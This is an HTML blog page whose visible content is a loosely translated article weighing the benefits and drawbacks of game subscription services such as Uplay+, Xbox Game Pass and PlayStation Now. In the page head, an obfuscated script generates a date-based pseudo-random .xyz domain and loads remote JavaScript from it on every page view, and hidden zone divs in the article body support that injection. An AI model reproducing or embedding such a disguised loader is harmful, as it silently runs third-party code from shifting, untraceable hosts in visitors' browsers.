<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="At the E3 game exhibition, Ubisoft, a French game company, announced that it will launch its own game subscription service uplay + on September 3 this year. Players who subscribe to this service can d">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="At the E3 game exhibition, Ubisoft, a French game company, announced that it will launch its own game subscription service uplay + on September 3 this year. Players who subscribe to this service can d">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/4f8adfa9534946a19c913c7bb74b0540.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/a16fe8ba130e42079c1d8b3b54a6b3e2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/3c4fee06a37b4f81aec4743bf7cd1bee.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/202dcfc6c19f41cdb1bec89319b0b676.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/bfd68df0942341109b55ffad31fecc81.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/e20f05f551ea4772a8b306a3da17500f.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/98928e0f2a0d4492841542d575f8c953.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/10b162bc517240f0be69fca1ab69ad4c.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:50.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way">
<meta name="twitter:description" content="At the E3 game exhibition, Ubisoft, a French game company, announced that it will launch its own game subscription service uplay + on September 3 this year. Players who subscribe to this service can d">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/4f8adfa9534946a19c913c7bb74b0540.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>At the E3 game exhibition, Ubisoft, a French game company, announced that it will launch its own game subscription service uplay + on September 3 this year. Players who subscribe to this service can directly experience most of Ubisoft’s games within the term, and even the upcoming new works can also download and play directly when they are launched, with a monthly fee of $14.99. Although the price is not expensive compared with the service provided by other manufacturers, it is not so cheap.<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/4f8adfa9534946a19c913c7bb74b0540.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>According to the data, in 2018, the highest revenue subscription service in Europe and the United States was Playstation now on Sony PS host platform, with a monthly fee of $20. Although the price is double that of Microsoft Xbox game pass, it still can earn three times of XGP revenue. Throughout the whole game field, more and more manufacturers have started to launch this service, which is going to become the mainstream. For our players, is the game subscription good or bad?</p>
<h1 id="digital-products"><a href="#digital-products" class="headerlink" title="digital products"></a>digital products</h1><p>Subscription service has been popular in the field of Internet since a long time ago. For example, the “members” we can see on major video websites at ordinary times, as long as we have members, we can get more permissions on video websites, and we can watch more videos only when we pay for them. In the early years, video games only have offline purchase of entities as a channel. With the gradual progress of science and technology, digital games have gradually gained a larger proportion in the game market. After all, although the price of carving a CD-ROM in the early physical games is not so expensive, no matter how much it is to promote, transport, store or even sell, it needs to pay a certain fee, and the cost will inevitably increase Make itself perhaps not expensive game cost multiplied growth. When digital games come into being, most of the cost can be avoided, which undoubtedly reduces the pressure on game manufacturers, and the extra money can also be used in other places.<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/a16fe8ba130e42079c1d8b3b54a6b3e2.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>Gamestop, a famous foreign game retailer, has closed many stores<br>Now the network level has begun to enter the 5g era, the network speed and quality have increased nearly ten times compared with the previous, and the significance of the existence of physical games is further weakened. Imagine that a game with a capacity of about 10g can be installed on your game device in just a few minutes or even seconds after it is paid. In the face of a physical version with the same or higher price, offline running or paying extra transportation costs, it is estimated that most people will choose the former. Let’s turn our thinking around for a moment and think about it. As a player, we only need to pay a small amount to experience hundreds of game works and even the newly launched 3A masterpieces. These games can sell at a higher price than the original ones. Isn’t this a loss business for developers?<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/3c4fee06a37b4f81aec4743bf7cd1bee.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>EA access membership service</p>
<p>#Why does   have subscription system?<br>From the perspective of developers, there is no difference between games and other real goods on the shelves, but at the same time, the biggest difference between games and real goods is that there is no substance, since there is no substance, there will be no “consumption” phenomenon. The author gives an example, for example, someone spent a little money to set up a member in a cosmetics store. One of the members’ privileges is that you can try all the products of the company without limit, so this person goes every day and consumes the products every day, which is undoubtedly a loss for the business. But this will not happen to video games, because video games are not substantive things, and paid subscription services can only exchange the right to use the game instead of the right to own it. This is like renting a game in the past. Although you only need to pay the rent and don’t need to pay the deposit to get the game, the condition without the deposit is that you can only play the game under the whole supervision of the network. When the time comes, you lose the game’s play authority. If you want to play next, you need to continue to pay, or directly buy the game in full, which is removed for the business There is almost no loss beyond the cost of developing games, and a profit can be made by the way.<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/202dcfc6c19f41cdb1bec89319b0b676.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>Apple arcade game subscription service<br>It seems that choosing the game subscription service is actually very profitable. You only need to pay a little money to experience hundreds of games, but in a limited time, how many games can players really fully experience? After all, you can’t play these hundreds of games at the same time. Maybe you are really good at spending a lot of time and clearing customs quickly. But if you play the game just to rush through customs, what’s the meaning of the game itself? In the view of players, subscription service may be blood earning, but for businesses, it is absolutely not a loss, and the blood earning is definitely businesses rather than players. In fact, it’s a very simple truth. If this service doesn’t earn money, what’s the need to launch it? And how can so many manufacturers adopt this marketing mode?<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/bfd68df0942341109b55ffad31fecc81.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>Google’s stadia cloud game will also adopt subscription charging system</p>
<p>#What do the insiders think?<br>In the game related industries, most people support subscription services. After all, even the cheapest buy-out game is not as good as it used to be. Many players often feel regret after buying the game, so they want to refund. Refund is always a thankless job, which is time-consuming, laborious and not profitable. As a developer, it is natural to try to avoid this situation. The subscription system can solve this problem well. This game is not fun. If you change it, you don’t need to experience all the content in one breath, so it’s not easy to regret the players. This kind of feeling is like the former gives a bucket of chocolate to the players. Although they are addicted, they can’t eat it all at once. How to eat too much will make them sick. The control of the quantity depends on the players themselves. The latter is like giving a bucket of chocolate to the players little by little every day. It’s neither painful nor itchy. Although it’s not addictive, it’s better than nothing, but it can’t be pointed out that one day it suddenly disappears and looks good It makes people feel uncomfortable.<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/e20f05f551ea4772a8b306a3da17500f.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>Sony Playstation now game subscription service<br>There is a consensus among relevant people: Although Sony’s PS now service is a long way ahead of other manufacturers, there is no doubt that Microsoft’s XGP is the most dedicated existence for developers and players, and its price performance is far higher than all subscription services. With more and more manufacturers joining in, it may be that in the future, players will not be divided into camps because of which one or which series, but around which group or another group of divisions, from the evaluation of the game itself to the evaluation of the manufacturer’s lineup. After all, players will not only pay to play a game, no doubt who’s game will win the favor of the players Who can stand out in this competition.<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/98928e0f2a0d4492841542d575f8c953.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>Microsoft Xbox game pass game subscription service</p>
<p>#Conclusion<br>There is no doubt that the game subscription system will be a major trend in the future, whether it is the platform or the manufacturer has already put into action or is still planning. Apple’s app arcade, Ubisoft’s uplay +, and even Google’s “cloud game” stadia, the lineup is undoubtedly expanding. Although this is a good thing for developers, it can’t guarantee that it’s a good thing for players. As mentioned above, players are bound to pay attention to a certain game lineup to choose consumption in the future, but who can guarantee that in the future, there will not be those players who make up a lot of money in this mode.<br><img src="http://maiygu.xyz/2019/11/08/You may earn blood, but I'm sure I'm not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way/10b162bc517240f0be69fca1ab69ad4c.jpg" alt="You may earn blood, but I&#39;m sure I&#39;m not losing. Read the advantages and disadvantages of the game subscription system in an easy to understand way"><br>After all, the traditional business model of buyout system will not disappear in any case, and the game subscription as an optional item is very much to choose to buy or to depend on the players themselves. After all, nowadays many players choose to buy a game with studio plot to a large extent, and choosing to buy is undoubtedly to support their favorite studio; but they can’t usually buy Games For players who spend too much time and money, subscription may be a good choice. As for the subscription system, I hold a wait-and-see attitude, and I will buy the game I like directly, because I really don’t like the feeling that what I paid for doesn’t belong to me; as for how you see it, please express your opinions in the comment area.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Who said that good games can't be made without big production What kind of magic does under the legend contain/" rel="next" title="Who said that good games can't be made without big production What kind of magic does under the legend contain">
                <i class="fa fa-chevron-left"></i> Who said that good games can't be made without big production What kind of magic does under the legend contain
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Why did the spiritual successor of Diablo, who was supposed to be a thriving company, get disbanded/" rel="prev" title="Why did the spiritual successor of Diablo, who was supposed to be a thriving company, get disbanded">
                Why did the spiritual successor of Diablo, who was supposed to be a thriving company, get disbanded <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#digital-products"><span class="nav-number">1.</span> <span class="nav-text">digital products</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
